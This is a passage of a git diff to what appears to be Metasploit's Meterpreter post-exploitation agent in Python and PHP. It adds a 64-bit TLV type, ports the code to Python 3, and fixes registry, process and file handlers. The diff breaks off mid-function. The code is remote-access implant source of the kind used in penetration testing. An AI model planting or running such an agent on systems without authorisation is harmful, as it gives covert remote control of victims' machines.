 TLV_TYPE_IMAGE_GROUP           = TLV_META_TYPE_GROUP   | 2405
 TLV_TYPE_IMAGE_NAME            = TLV_META_TYPE_STRING  | 2406
 
 TLV_TYPE_THREAD_ID             = TLV_META_TYPE_UINT    | 2500
 TLV_TYPE_THREAD_PERMS          = TLV_META_TYPE_UINT    | 2502
 TLV_TYPE_EXIT_CODE             = TLV_META_TYPE_UINT    | 2510
-TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_UINT    | 2511
-TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_UINT    | 2512
+TLV_TYPE_ENTRY_POINT           = TLV_META_TYPE_QWORD   | 2511
+TLV_TYPE_ENTRY_PARAMETER       = TLV_META_TYPE_QWORD   | 2512
 TLV_TYPE_CREATION_FLAGS        = TLV_META_TYPE_UINT    | 2513
 
 TLV_TYPE_REGISTER_NAME         = TLV_META_TYPE_STRING  | 2540
@@ -407,7 +426,7 @@ TLV_TYPE_DESKTOP               = TLV_META_TYPE_STRING  | 3002
 # Event Log
 ##
 TLV_TYPE_EVENT_SOURCENAME      = TLV_META_TYPE_STRING  | 4000
-TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_UINT    | 4001
+TLV_TYPE_EVENT_HANDLE          = TLV_META_TYPE_QWORD   | 4001
 TLV_TYPE_EVENT_NUMRECORDS      = TLV_META_TYPE_UINT    | 4002
 
 TLV_TYPE_EVENT_READFLAGS       = TLV_META_TYPE_UINT    | 4003
@@ -498,11 +517,12 @@ def get_stat_buffer(path):
 		blocks = si.st_blocks
 	st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
 	st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
-	st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
+	st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
 	st_buf += struct.pack('<II', blksize, blocks)
 	return st_buf
 
 def netlink_request(req_type):
+	import select
 	# See RFC 3549
 	NLM_F_REQUEST    = 0x0001
 	NLM_F_ROOT       = 0x0100
@@ -513,17 +533,25 @@ def netlink_request(req_type):
 	sock.bind((os.getpid(), 0))
 	seq = int(time.time())
 	nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
-	sfd = os.fdopen(sock.fileno(), 'w+b')
-	sfd.write(nlmsg)
+	sock.send(nlmsg)
 	responses = []
-	response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
+	if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
+		return responses
+	raw_response_data = sock.recv(0xfffff)
+	response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
+	raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
 	while response.type != NLMSG_DONE:
 		if response.type == NLMSG_ERROR:
 			break
-		response_data = sfd.read(response.len - 16)
+		response_data = raw_response_data[:(response.len - 16)]
 		responses.append(response_data)
-		response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
-	sfd.close()
+		raw_response_data = raw_response_data[len(response_data):]
+		if not len(raw_response_data):
+			if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
+				break
+			raw_response_data = sock.recv(0xfffff)
+		response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
+		raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
 	sock.close()
 	return responses
 
@@ -559,7 +587,7 @@ def channel_open_stdapi_fs_file(request, response):
 	else:
 		fmode = 'rb'
 	file_h = open(fpath, fmode)
-	channel_id = meterpreter.add_channel(file_h)
+	channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
 	response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
 	return ERROR_SUCCESS, response
 
@@ -675,6 +703,7 @@ def stdapi_sys_process_execute(request, response):
 			proc_h.stderr = open(os.devnull, 'rb')
 		else:
 			proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+			proc_h.echo_protection = True
 		proc_h.start()
 	else:
 		proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -693,15 +722,15 @@ def stdapi_sys_process_getpid(request, response):
 
 def stdapi_sys_process_get_processes_via_proc(request, response):
 	for pid in os.listdir('/proc'):
-		pgroup = ''
+		pgroup = bytes()
 		if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
 			continue
-		cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
-		status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
+		cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
+		cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
+		status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
 		status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
-		status_data = filter(lambda x: len(x) == 2, status_data)
 		status = {}
-		for k, v in status_data:
+		for k, v in filter(lambda x: len(x) == 2, status_data):
 			status[k[:-1]] = v.strip()
 		ppid = status.get('PPid')
 		uid = status.get('Uid').split('\t', 1)[0]
@@ -725,14 +754,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response):
 def stdapi_sys_process_get_processes_via_ps(request, response):
 	ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
 	proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
-	ps_output = proc_h.stdout.read()
+	ps_output = str(proc_h.stdout.read())
 	ps_output = ps_output.split('\n')
 	ps_output.pop(0)
 	for process in ps_output:
 		process = process.split()
 		if len(process) < 4:
 			break
-		pgroup = ''
+		pgroup  = bytes()
 		pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
 		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
 		pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
@@ -793,7 +822,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
 				use = ctypes.c_ulong()
 				use.value = 0
 				ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
-				complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
+				complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
 			k32.CloseHandle(tkn_h)
 		parch = windll_GetNativeSystemInfo()
 		is_wow64 = ctypes.c_ubyte()
@@ -802,7 +831,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
 			if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
 				if is_wow64.value:
 					parch = PROCESS_ARCH_X86
-		pgroup = ''
+		pgroup  = bytes()
 		pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
 		pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
 		pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
@@ -850,16 +879,18 @@ def stdapi_fs_delete_dir(request, response):
 @meterpreter.register_function
 def stdapi_fs_delete_file(request, response):
 	file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
-	os.unlink(file_path)
+	if os.path.exists(file_path):
+		os.unlink(file_path)
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
 def stdapi_fs_file_expand_path(request, response):
 	path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
 	if has_windll:
+		path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
 		path_out = (ctypes.c_char * 4096)()
-		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
-		result = ''.join(path_out)[:path_out_len]
+		path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
+		result = str(ctypes.string_at(path_out))
 	elif path_tlv == '%COMSPEC%':
 		result = '/bin/sh'
 	elif path_tlv in ['%TEMP%', '%TMP%']:
@@ -912,7 +943,8 @@ def stdapi_fs_md5(request, response):
 @meterpreter.register_function
 def stdapi_fs_mkdir(request, response):
 	dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
-	os.mkdir(dir_path)
+	if not os.path.isdir(dir_path):
+		os.mkdir(dir_path)
 	return ERROR_SUCCESS, response
 
 @meterpreter.register_function
@@ -965,7 +997,7 @@ def stdapi_fs_stat(request, response):
 
 @meterpreter.register_function
 def stdapi_net_config_get_interfaces(request, response):
-	if hasattr(socket, 'AF_NETLINK'):
+	if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
 		interfaces = stdapi_net_config_get_interfaces_via_netlink()
 	elif has_osxsc:
 		interfaces = stdapi_net_config_get_interfaces_via_osxsc()
@@ -974,7 +1006,7 @@ def stdapi_net_config_get_interfaces(request, response):
 	else:
 		return ERROR_FAILURE, response
 	for iface_info in interfaces:
-		iface_tlv  = ''
+		iface_tlv  = bytes()
 		iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
 		iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
 		if 'mtu' in iface_info:
@@ -1002,7 +1034,7 @@ def stdapi_net_config_get_interfaces_via_netlink():
 		0x0100: 'PROMISC',
 		0x1000: 'MULTICAST'
 	}
-	iface_flags_sorted = iface_flags.keys()
+	iface_flags_sorted = list(iface_flags.keys())
 	# Dictionaries don't maintain order
 	iface_flags_sorted.sort()
 	interfaces = {}
@@ -1106,7 +1138,7 @@ def stdapi_net_config_get_interfaces_via_osxsc():
 			hw_addr = hw_addr.replace(':', '')
 			hw_addr = hw_addr.decode('hex')
 			iface_info['hw_addr'] = hw_addr
-	ifnames = interfaces.keys()
+	ifnames = list(interfaces.keys())
 	ifnames.sort()
 	for iface_name, iface_info in interfaces.items():
 		iface_info['index'] = ifnames.index(iface_name)
@@ -1138,7 +1170,10 @@ def stdapi_net_config_get_interfaces_via_windll():
 		iface_info['index'] = AdapterAddresses.u.s.IfIndex
 		if AdapterAddresses.PhysicalAddressLength:
 			iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
-		iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
+		iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
+		if not is_str(iface_desc):
+			iface_desc = str(iface_desc)
+		iface_info['name'] = iface_desc
 		iface_info['mtu'] = AdapterAddresses.Mtu
 		pUniAddr = AdapterAddresses.FirstUnicastAddress
 		while pUniAddr:
@@ -1174,7 +1209,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
 	table_data = ctypes.string_at(table, pdwSize.value)
 	entries = struct.unpack('I', table_data[:4])[0]
 	table_data = table_data[4:]
-	for i in xrange(entries):
+	for i in range(entries):
 		addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
 		ifrow = MIB_IFROW()
 		ifrow.dwIndex = addrrow.dwIndex
@@ -1244,9 +1279,10 @@ def stdapi_registry_close_key(request, response):
 def stdapi_registry_create_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 	res_key = ctypes.c_void_p()
-	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
+	if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
 		response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
 		return ERROR_SUCCESS, response
 	return ERROR_FAILURE, response
@@ -1255,18 +1291,20 @@ def stdapi_registry_create_key(request, response):
 def stdapi_registry_delete_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 	flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
 	if (flags & DELETE_KEY_FLAG_RECURSIVE):
-		result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
+		result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
 	else:
-		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
+		result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
 	return result, response
 
 @meterpreter.register_function_windll
 def stdapi_registry_delete_value(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
-	result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
+	value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
+	result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
 	return result, response
 
 @meterpreter.register_function_windll
@@ -1335,9 +1373,10 @@ def stdapi_registry_load_key(request, response):
 def stdapi_registry_open_key(request, response):
 	root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 	base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+	base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 	permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 	handle_id = ctypes.c_void_p()
-	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
+	if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
 		response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
 		return ERROR_SUCCESS, response
 	return ERROR_FAILURE, response
@@ -1367,24 +1406,26 @@ def stdapi_registry_query_class(request, response):
 
 @meterpreter.register_function_windll
 def stdapi_registry_query_value(request, response):
-	REG_SZ = 1
-	REG_DWORD = 4
 	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
 	value_type = ctypes.c_uint32()
 	value_type.value = 0
 	value_data = (ctypes.c_ubyte * 4096)()
 	value_data_sz = ctypes.c_uint32()
 	value_data_sz.value = ctypes.sizeof(value_data)
-	result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
+	result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
 	if result == ERROR_SUCCESS:
 		response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
-		if value_type.value == REG_SZ:
-			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
-		elif value_type.value == REG_DWORD:
+		if value_type.value == winreg.REG_SZ:
+			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
+		elif value_type.value == winreg.REG_DWORD:
 			value = value_data[:4]
 			value.reverse()
-			value = ''.join(map(chr, value))
+			if sys.version_info[0] < 3:
+				value = ''.join(map(chr, value))
+			else:
+				value = bytes(value)
 			response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
 		else:
 			response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
@@ -1395,9 +1436,10 @@ def stdapi_registry_query_value(request, response):
 def stdapi_registry_set_value(request, response):
 	hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
 	value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
+	value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
 	value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
 	value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
-	result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
+	result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
 	return result, response
 
 @meterpreter.register_function_windll
diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll
deleted file mode 100755
index 8c96c6c836..0000000000
Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and /dev/null differ
diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll
deleted file mode 100755
index ed5983658d..0000000000
Binary files a/data/meterpreter/ext_server_stdapi.x86.dll and /dev/null differ
diff --git a/data/meterpreter/meterpreter.jar b/data/meterpreter/meterpreter.jar
index 06d20d28ab..6754a37228 100644
Binary files a/data/meterpreter/meterpreter.jar and b/data/meterpreter/meterpreter.jar differ
diff --git a/data/meterpreter/meterpreter.php b/data/meterpreter/meterpreter.php
index c33885d901..cd4580a58f 100755
--- a/data/meterpreter/meterpreter.php
+++ b/data/meterpreter/meterpreter.php
@@ -125,6 +125,7 @@ define("TLV_META_TYPE_STRING",     (1 << 16));
 define("TLV_META_TYPE_UINT",       (1 << 17));
 define("TLV_META_TYPE_RAW",        (1 << 18));
 define("TLV_META_TYPE_BOOL",       (1 << 19));
+define("TLV_META_TYPE_QWORD",      (1 << 20));
 define("TLV_META_TYPE_COMPRESSED", (1 << 29));
 define("TLV_META_TYPE_GROUP",      (1 << 30));
 define("TLV_META_TYPE_COMPLEX",    (1 << 31));
@@ -655,6 +656,11 @@ function tlv_pack($tlv) {
     if (($tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
         $ret = pack("NNa*", 8 + strlen($tlv['value'])+1, $tlv['type'], $tlv['value'] . "\0");
     }
+    elseif (($tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
+        $hi = ($tlv['value'] >> 32) & 0xFFFFFFFF;
+        $lo = $tlv['value'] & 0xFFFFFFFF;
+        $ret = pack("NNNN", 8 + 8, $tlv['type'], $hi, $lo);
+    }
     elseif (($tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
         $ret = pack("NNN", 8 + 4, $tlv['type'], $tlv['value']);
     }
@@ -686,10 +692,17 @@ function tlv_unpack($raw_tlv) {
     my_print("len: {$tlv['len']}, type: {$tlv['type']}");
     if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
         $tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
+        # PHP 5.5.0 modifed the 'a' unpack format to stop removing the trailing
+        # NULL, so catch that here
+        $tlv['value'] = str_replace("\0", "", $tlv['value']);
     }
     elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
         $tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
     }
+    elseif (($type & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD) {
+        $tlv = unpack("Nlen/Ntype/Nhi/Nlo", substr($raw_tlv, 0, $tlv['len']));
+        $tlv['value'] = $tlv['hi'] << 32 | $tlv['lo'];
+    }
     elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
         $tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
     }
@@ -911,7 +924,8 @@ function read($resource, $len=null) {
         $r = Array($resource);
         my_print("Calling select to see if there's data on $resource");
         while (true) {
-            $cnt = stream_select($r, $w=NULL, $e=NULL, 0);
+            $w=NULL;$e=NULL;$t=0;
+            $cnt = stream_select($r, $w, $e, $t);
 
             # Stream is not ready to read, have to live with what we've gotten
             # so far
@@ -1147,7 +1161,8 @@ add_reader($msgsock);
 # Main dispatch loop
 #
 $r=$GLOBALS['readers'];
-while (false !== ($cnt = select($r, $w=null, $e=null, 1))) {
+$w=NULL;$e=NULL;$t=1;
+while (false !== ($cnt = select($r, $w, $e, $t))) {
     #my_print(sprintf("Returned from select with %s readers", count($r)));
     $read_failed = false;
     for ($i = 0; $i < $cnt; $i++) {
diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 979ebb4107..693f83a3c5 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -1,12 +1,5 @@
 #!/usr/bin/python
 import code
-try:
-	import ctypes
-except:
-	has_windll = False
-else:
-	has_windll = hasattr(ctypes, 'windll')
-
 import os
 import random
 import select
@@ -15,10 +8,30 @@ import struct
 import subprocess
 import sys
 import threading
+import time
+import traceback
+
+try:
+	import ctypes
+except ImportError:
+	has_windll = False
+else:
+	has_windll = hasattr(ctypes, 'windll')
+
+if sys.version_info[0] < 3:
+	is_bytes = lambda obj: issubclass(obj.__class__, str)
+	bytes = lambda *args: str(*args[:1])
+	NULL_BYTE = '\x00'
+else:
+	is_bytes = lambda obj: issubclass(obj.__class__, bytes)
+	str = lambda x: __builtins__['str'](x, 'UTF-8')
+	NULL_BYTE = bytes('\x00', 'UTF-8')
 
 #
 # Constants
 #
+DEBUGGING = False
+
 PACKET_TYPE_REQUEST        = 0
 PACKET_TYPE_RESPONSE       = 1
 PACKET_TYPE_PLAIN_REQUEST  = 10
@@ -41,6 +54,7 @@ TLV_META_TYPE_STRING     = (1 << 16)
 TLV_META_TYPE_UINT       = (1 << 17)
 TLV_META_TYPE_RAW        = (1 << 18)
 TLV_META_TYPE_BOOL       = (1 << 19)
+TLV_META_TYPE_QWORD      = (1 << 20)
 TLV_META_TYPE_COMPRESSED = (1 << 29)
 TLV_META_TYPE_GROUP      = (1 << 30)
 TLV_META_TYPE_COMPLEX    = (1 << 31)
@@ -100,6 +114,7 @@ TLV_TYPE_LOCAL_HOST            = TLV_META_TYPE_STRING  | 1502
 TLV_TYPE_LOCAL_PORT            = TLV_META_TYPE_UINT    | 1503
 
 EXPORTED_SYMBOLS = {}
+EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
 
 def export(symbol):
 	EXPORTED_SYMBOLS[symbol.__name__] = symbol
@@ -107,7 +122,7 @@ def export(symbol):
 
 def generate_request_id():
 	chars = 'abcdefghijklmnopqrstuvwxyz'
-	return ''.join(random.choice(chars) for x in xrange(32))
+	return ''.join(random.choice(chars) for x in range(32))
 
 @export
 def inet_pton(family, address):
@@ -125,25 +140,6 @@ def inet_pton(family, address):
 			return ''.join(map(chr, lpAddress[8:24]))
 	raise Exception('no suitable inet_pton functionality is available')
 
-@export
-def packet_get_tlv(pkt, tlv_type):
-	offset = 0
-	while (offset < len(pkt)):
-		tlv = struct.unpack('>II', pkt[offset:offset+8])
-		if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
-			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
-			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-				val = val.split('\x00', 1)[0]
-			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
-				val = struct.unpack('>I', val)[0]
-			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
-				val = bool(struct.unpack('b', val)[0])
-			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
-				pass
-			return {'type':tlv[1], 'length':tlv[0], 'value':val}
-		offset += tlv[0]
-	return {}
-
 @export
 def packet_enum_tlvs(pkt, tlv_type = None):
 	offset = 0
@@ -152,9 +148,11 @@ def packet_enum_tlvs(pkt, tlv_type = None):
 		if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
 			val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
 			if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-				val = val.split('\x00', 1)[0]
+				val = str(val.split(NULL_BYTE, 1)[0])
 			elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
 				val = struct.unpack('>I', val)[0]
+			elif (tlv[1] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
+				val = struct.unpack('>Q', val)[0]
 			elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
 				val = bool(struct.unpack('b', val)[0])
 			elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
@@ -163,6 +161,14 @@ def packet_enum_tlvs(pkt, tlv_type = None):
 		offset += tlv[0]
 	raise StopIteration()
 
+@export
+def packet_get_tlv(pkt, tlv_type):
+	try:
+		tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
+	except IndexError:
+		return {}
+	return tlv
+
 @export
 def tlv_pack(*args):
 	if len(args) == 2:
@@ -170,20 +176,35 @@ def tlv_pack(*args):
 	else:
 		tlv = args[0]
 	data = ""
-	if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
-		data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
-	elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
+	if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
 		data = struct.pack('>III', 12, tlv['type'], tlv['value'])
+	elif (tlv['type'] & TLV_META_TYPE_QWORD) == TLV_META_TYPE_QWORD:
+		data = struct.pack('>IIQ', 16, tlv['type'], tlv['value'])
 	elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
-		data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
-	elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
-		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
-	elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
-		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
-	elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
-		data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
+		data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
+	else:
+		value = tlv['value']
+		if not is_bytes(value):
+			value = bytes(value, 'UTF-8')
+		if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
+			data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
+		elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
+			data = struct.pack('>II', 8 + len(value), tlv['type']) + value
+		elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
+			data = struct.pack('>II', 8 + len(value), tlv['type']) + value
+		elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
+			data = struct.pack('>II', 8 + len(value), tlv['type']) + value
 	return data
 
+#@export
+class MeterpreterFile(object):
+	def __init__(self, file_obj):
+		self.file_obj = file_obj
+
+	def __getattr__(self, name):
+		return getattr(self.file_obj, name)
+export(MeterpreterFile)
+
 #@export
 class MeterpreterSocket(object):
 	def __init__(self, sock):
@@ -208,11 +229,11 @@ class STDProcessBuffer(threading.Thread):
 		threading.Thread.__init__(self)
 		self.std = std
 		self.is_alive = is_alive
-		self.data = ''
+		self.data = bytes()
 		self.data_lock = threading.RLock()
 
 	def run(self):
-		for byte in iter(lambda: self.std.read(1), ''):
+		for byte in iter(lambda: self.std.read(1), bytes()):
 			self.data_lock.acquire()
 			self.data += byte
 			self.data_lock.release()
@@ -220,15 +241,20 @@ class STDProcessBuffer(threading.Thread):
 	def is_read_ready(self):
 		return len(self.data) != 0
 
-	def read(self, l = None):
-		data = ''
+	def peek(self, l = None):
+		data = bytes()
 		self.data_lock.acquire()
 		if l == None:
 			data = self.data
-			self.data = ''
 		else:
 			data = self.data[0:l]
-			self.data = self.data[l:]
+		self.data_lock.release()
+		return data
+
+	def read(self, l = None):
+		self.data_lock.acquire()
+		data = self.peek(l)
+		self.data = self.data[len(data):]
 		self.data_lock.release()
 		return data
 
@@ -236,12 +262,25 @@ class STDProcessBuffer(threading.Thread):
 class STDProcess(subprocess.Popen):
 	def __init__(self, *args, **kwargs):
 		subprocess.Popen.__init__(self, *args, **kwargs)
+		self.echo_protection = False
 
 	def start(self):
 		self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
 		self.stdout_reader.start()
 		self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
 		self.stderr_reader.start()
+
+	def write(self, channel_data):
+		self.stdin.write(channel_data)
+		self.stdin.flush()
+		if self.echo_protection:
